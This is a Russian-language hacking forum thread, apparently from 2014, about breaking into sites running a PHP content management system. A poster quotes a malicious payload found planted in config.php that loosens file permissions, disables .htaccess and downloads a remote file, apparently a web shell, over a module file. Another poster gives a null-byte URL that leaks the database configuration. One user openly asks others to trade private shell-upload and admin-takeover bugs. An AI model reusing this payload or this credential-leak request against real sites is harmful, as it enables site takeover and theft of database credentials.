 |
|
26.02.2014, 08:13
|
|
Постоянный
Регистрация: 27.02.2011
Сообщений: 733
С нами:
8003126
Репутация:
19
|
|
Donnel, просто запрет скачивания .htaccess не стоит, и поэтому загрузился, а при нормальной настройке сервера .php скрипты выполняются и выводится рез-тат их работы, а не их содержание.
|
|
|
26.02.2014, 13:11
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
|
|
|
|
27.02.2014, 20:55
|
|
Новичок
Регистрация: 20.02.2014
Сообщений: 5
С нами:
6434966
Репутация:
0
|
|
Я понял, что php скачать нельзя, но черт подери, я же скачивал admin.php, до-него то я знал путь, .lng файлы и тому подобное. С этим ничего нельзя сделать?
|
|
|
|
27.02.2014, 21:10
|
|
Познающий
Регистрация: 11.12.2013
Сообщений: 62
С нами:
6537206
Репутация:
15
|
|
вот недавно нашел в config.php , как юзают ..хз
Код:
.eval(base64_decode(chmod("engine/modules/", 0777); chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php"); chmod("engine/modules/avatar.class.php", 0404);)),//
|
|
|
|
03.03.2014, 13:31
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
С нами:
8670841
Репутация:
-4
|
|
Сообщение от hpol
вот недавно нашел в config.php , как юзают ..хз
Код:
.eval(base64_decode(chmod("engine/modules/", 0777); chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php"); chmod("engine/modules/avatar.class.php", 0404);)),//
Записывается это скорее всего из раздела "Настройки". Какое то поле не фильтруется должным образом, пропуская кавычки...
Чтобы ответить точно на вопрос, нужно точно смотреть как выглядит config.php после взлома.
|
|
|
|
18.03.2014, 17:21
|
|
Новичок
Регистрация: 14.03.2014
Сообщений: 0
С нами:
6403286
Репутация:
0
|
|
ахаха ты вы че ламеры вот же
copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");
тут походу шелл лежал, подозреваю, что s = shell
|
|
|
|
21.03.2014, 14:42
|
|
Новичок
Регистрация: 21.10.2010
Сообщений: 21
С нами:
8188886
Репутация:
-5
|
|
ramauf , ты дaлбaёб?
вопрос был изначально не что это ТАМ, а как удалось этот код пропихнуть умник бля...
вопрос актуален, некто не вкурсе как удалось пропихнуть туда этот код ?
если есть приват способы по загрузке шелла/выполнению кода ,либо иные баги по получению админского аккаунта, готов принять в дар, либо обменять на шелл,либо иные варианты..
|
|
|
|
21.03.2014, 17:43
|
|
Познающий
Регистрация: 11.12.2013
Сообщений: 62
С нами:
6537206
Репутация:
15
|
|
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
вот эту тему встречал на нескольких десятых версиях , выдаёт данные от myadmin
|
|
|
|
22.03.2014, 03:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 178
С нами:
9731846
Репутация:
622
|
|
Сообщение от RexelNet
ramauf , ты дaлбaёб?
вопрос был изначально не что это ТАМ, а как удалось этот код пропихнуть умник бля...
вопрос актуален, некто не вкурсе как удалось пропихнуть туда этот код ?
если есть приват способы по загрузке шелла/выполнению кода ,либо иные баги по получению админского аккаунта, готов принять в дар, либо обменять на шелл,либо иные варианты..
в версиях ниже 9.7 можно пропихнуть
|
|
|
|
26.03.2014, 14:49
|
|
Новичок
Регистрация: 20.02.2014
Сообщений: 5
С нами:
6434966
Репутация:
0
|
|
Сообщение от hpol
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
вот эту тему встречал на нескольких десятых версиях , выдаёт данные от myadmin
Или тебе повезло, или админ сайта плохо защитил файлы, или мне, наоборот, не везет - у меня не работает.
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
